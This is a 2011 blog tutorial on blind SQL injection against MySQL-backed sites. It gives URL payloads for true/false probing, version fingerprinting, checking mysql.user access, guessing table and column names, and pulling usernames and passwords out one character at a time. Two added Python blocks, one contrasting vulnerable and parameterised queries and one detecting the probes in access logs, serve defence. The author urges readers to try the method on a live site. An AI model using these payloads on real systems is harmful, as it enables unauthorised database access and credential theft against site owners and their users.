Wednesday, February 16, 2011

SQL INJECTION IN DETAIL (Cont.)


Hello, I am back with good news: I got a job :) Let's continue with my previous article about SQL injection.
Here I am explaining blind SQLi. It is a time-consuming injection because you will have to guess many things, which means you should have good guessing skills as well as luck :).


BLIND SQL INJECTION :-
     I think I need to write the definition of blind injection here, so I am copying it from Wikipedia. Here is the definition: http://en.wikipedia.org/wiki/SQL_injection#Blind_SQL_injection

Testing if the target is vulnerable to MySQL blind SQLi :-
=> http://targetsite.com/news.php?id=5 and 1=1
 ^ as this is always true, the page loads normally :))
=> http://test.com/news.php?id=5 and 1=2
^ this one is false :P so if some text, a picture or other content is missing from the returned page, then that site is vulnerable to blind SQL injection.
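Added example, not code from the original post: a Python stand-in for the news.php lookup (a constructed in-memory SQLite table with an assumed `title` column) that shows why the true/false test above works when the id is pasted into the query text, and why the same two probes become indistinguishable once the id is type-checked and bound as a parameter.

```python
import sqlite3


def make_db():
    # Constructed stand-in for the backend behind news.php?id=5 (not the real site).
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
    conn.execute("INSERT INTO news VALUES (5, 'Blind SQLi explained')")
    conn.commit()
    return conn


def vulnerable_lookup(conn, raw_id):
    # The flaw the post relies on: the request parameter becomes part of the SQL
    # text, so "5 and 1=2" rewrites the WHERE clause and the article disappears.
    row = conn.execute(f"SELECT title FROM news WHERE id = {raw_id}").fetchone()
    return row[0] if row else None


def hardened_lookup(conn, raw_id):
    # Two layers: the identifier must be a plain integer, and it is passed as a
    # bound parameter, so it can never be interpreted as SQL.
    try:
        news_id = int(raw_id)
    except (TypeError, ValueError):
        return None
    row = conn.execute("SELECT title FROM news WHERE id = ?", (news_id,)).fetchone()
    return row[0] if row else None


def has_boolean_oracle(lookup, conn):
    # The post's detection test: the "always true" and "always false" probes for
    # the same record give different pages. A blind oracle exists only if they do.
    return lookup(conn, "5 and 1=1") != lookup(conn, "5 and 1=2")
```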

Getting the MySQL version in blind SQLi :- to get the version in a blind attack we use substring, i.e.
  => http://targetsite.com/news.php?id=5 and substring(@@version,1,1)=4
       ^ this should return TRUE if the MySQL version is 4 (replace 4 with 5, and if the query returns TRUE then the version is 5).
Now test if subselects work (when select doesn't work, we use subselect),
i.e.
=> http://targetsite.com/news.php?id=5 and (select 1)=1
      ^ if the page loads normally then subselects work.
Now, let's see if we have access to => mysql.user
=> http://targetsite.com/news.php?id=5 and (select 1 from mysql.user limit 0,1)=1
If the page loads normally we have access to mysql.user, and later we can fetch some passwords using the load_file() function and OUTFILE.

Check table and column names :-
# The guessing work starts here, that is,
=> http://targetsite.com/news.php?id=5 and (select 1 from users limit 0,1)=1
  ^ (with limit 0,1 our query returns one row of data, because the subselect must return only one row; this is very important). If the page loads normally without content missing, the table users exists. If you get FALSE (or some content is missing), just change the table name until you guess the right one :). Let's say I have found that the table name is users; now what we need is the column name !! :D
# The same as with the table name, we start guessing.
=> http://targetsite.com/news.php?id=5 and (select substring(concat(1,password),1,1) from users limit 0,1)=1
# If the page loads normally we know that the column name is password (if we get FALSE, then try common names or just guess).
Here we merge 1 with the column password, then substring returns the first character (,1,1). Because 1 is prepended, that first character is always '1' whenever the column exists, whatever the column holds, so the comparison =1 only fails when the column name is wrong.

 Fetch data from the database :-
I found the table users with the columns username and password, so I'm going to pull characters from those.
=> http://targetsite.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80
OK, this fetches the first character of the first user in table users.
substring here returns the first character, 1 character in length. ascii() converts that one character into its ASCII value,
 which is then compared using the greater-than symbol ">". So if the ASCII value is greater than 80, the page loads normally: TRUE.

>> keep trying until you get FALSE.
=> http://targetsite.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>95
# we get TRUE, keep incrementing
=> http://targetsite.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>98
TRUE again, increment
=> http://targetsite.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99
got FALSE!!!
So the first character of the username is char(99). Using an ASCII table we know that char(99) is the letter 'c'.

=>> then let's check the second character.
=> http://targetsite.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>99
# Note that I have changed ,1,1 to ,2,1 to get the second character (now it returns the second character, 1 character in length).
=> http://targetsite.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>99
TRUE, the page loads normally, go higher.
=> http://targetsite.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>107
# FALSE, lower number.
=> http://targetsite.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>104
# TRUE, increment.
=> http://targetsite.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>105
# FALSE!!!
# We know that the second character is char(105), which is 'i'. We have 'ci' so far.
# So keep incrementing until you reach the end (when >0 returns FALSE we know that we have reached the end and have got the data we wanted from the table).
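Added example from the defender's side, not part of the original article: detection logic run over constructed access-log lines modelled on the request sequence above. It flags a client that sends repeated probe requests and shows that the content-present / content-missing oracle the method depends on is visible server-side as alternating response sizes. The log format, IP addresses, timestamps and byte counts are all constructed.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed access-log sample (combined-log style, trimmed), modelled on the
# request sequence in the article. IPs, timestamps and sizes are made up.
SAMPLE_LOG = """\
10.0.0.7 - - [16/Feb/2011:10:01:01 +0000] "GET /news.php?id=5 HTTP/1.1" 200 5120
10.0.0.9 - - [16/Feb/2011:10:01:03 +0000] "GET /news.php?id=5%20and%201=1 HTTP/1.1" 200 5120
10.0.0.9 - - [16/Feb/2011:10:01:04 +0000] "GET /news.php?id=5%20and%201=2 HTTP/1.1" 200 1830
10.0.0.9 - - [16/Feb/2011:10:01:06 +0000] "GET /news.php?id=5%20and%20ascii(substring((SELECT%20concat(username,0x3a,password)%20from%20users%20limit%200,1),1,1))>80 HTTP/1.1" 200 5120
10.0.0.9 - - [16/Feb/2011:10:01:07 +0000] "GET /news.php?id=5%20and%20ascii(substring((SELECT%20concat(username,0x3a,password)%20from%20users%20limit%200,1),1,1))>99 HTTP/1.1" 200 1830
10.0.0.7 - - [16/Feb/2011:10:01:09 +0000] "GET /news.php?id=7 HTTP/1.1" 200 4990
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*" (\d{3}) (\d+)')

# Probe signatures taken from the article: the "and 1=1" / "and 1=2" pair, the
# @@version check and the ascii(substring( extraction. Matched on the decoded query.
PROBE_RE = re.compile(
    r"\band\s+\d+\s*=\s*\d+\b|\bascii\s*\(\s*substring\s*\(|\bsubstring\s*\(\s*@@version",
    re.IGNORECASE,
)


def find_blind_sqli_clients(log_text, min_probes=3):
    """Return {client_ip: [(decoded_query, response_bytes), ...]} for every client
    that sent at least min_probes requests matching the probe signatures."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, target, _status, size = m.groups()
        query = unquote_plus(target.partition("?")[2])
        if PROBE_RE.search(query):
            hits[ip].append((query, int(size)))
    return {ip: probes for ip, probes in hits.items() if len(probes) >= min_probes}


def response_sizes_differ(probes):
    # The oracle the article relies on is visible server-side: one client's probe
    # requests alternate between two response sizes (content present vs missing).
    return len({size for _query, size in probes}) > 1
```

A request count threshold alone is noisy on busy sites; pairing it with the two-size pattern from one client against one resource is what separates a blind-injection session from a stray scanner hit.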

I know that this injection is really boring and tough. So try this method on at least one site; otherwise there are many tools which help you with blind SQLi, and you can use them too.

Wait for my next article :)
sanjeev